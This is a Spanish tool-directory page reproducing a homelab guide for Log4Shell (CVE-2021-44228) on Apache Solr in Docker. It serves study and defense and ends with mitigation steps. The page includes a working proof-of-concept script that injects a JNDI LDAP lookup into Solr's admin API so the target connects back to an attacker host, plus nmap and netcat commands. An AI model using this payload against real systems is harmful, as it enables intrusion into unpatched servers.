Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
homelab-CVE-2021-44228 — Log4j Vulnerability homelab | Kitploit
Herramientas/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j Vulnerability homelab

Ver Repositorio
4hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Homelab: Log4Shell (CVE-2021-44228) en Apache Solr

Entorno controlado en Docker para reproducir y estudiar la vulnerabilidad Log4Shell en Apache Solr.

El Entorno

  • Objetivo (solr-lab): Apache Solr v8.11.0 (vulhub/solr:8.11.0) ejecutando una versión vulnerable de Log4j.
  • Atacante (kali-lab): Contenedor Kali Linux básico con nmap, curl y netcat preinstalados.

Cómo Levantar el Lab

1. Inicializar los contenedores

En su terminal, levante el entorno en segundo plano:

root@kitploit:~
docker compose up -d --build

2. Ingresar al Kali (Contenedor Atacante)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. Mapear la red interna

Dentro del contenedor Kali, descubra su propia subred y localice la IP de Apache Solr:

root@kitploit:~
# 1. Vea su IP y máscara de red
hostname -I

# 2. Escanee la red interna para encontrar la IP del objetivo (puerto de Solr: 8983)
# (Sustituya la subnet de abajo según la IP que obtuvo en el comando anterior)
nmap -p 8983 172.20.0.0/24


Ejecutando la PoC (Proof of Concept)

El script poc.sh inyecta el payload de lookup JNDI en el parámetro de la API de administración de Solr.

El Script (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Uso: $0 <lhost> <rhost> [lport]"
    echo "Exemplo: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Alvo: $TARGET"
echo "[*] Atacante (LDAP): $KALI na porta $PORT_KALI"
echo "[*] Disparando exploit..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

Ejecución

Todavía dentro de Kali, dé permiso al script y ejecute pasando las IPs correctas:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_DEL_KALI> <IP_DEL_SOLR> 1389

¿Qué sucede aquí? Solr procesará la solicitud e intentará abrir una conexión LDAP de vuelta a la IP de Kali en el puerto especificado. Puede monitorear ese intento de conexión abriendo un listener rápido en Kali antes de ejecutar el script (ej: nc -lnvp 1389).


Mitigación

Para corregir la falla en Log4j 2:

  • Actualización: Migrar la biblioteca a versiones seguras (superior a 2.15.0 o 2.17.1).
  • JVM Format Msg: En versiones entre 2.10 y 2.14.1, desactivar los lookups agregando la flag -Dlog4j2.formatMsgNoLookups=true en la inicialización de Java.
  • Eliminación de Clase: Eliminar manualmente la clase problemática del jar si no puede actualizar:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Descargar herramienta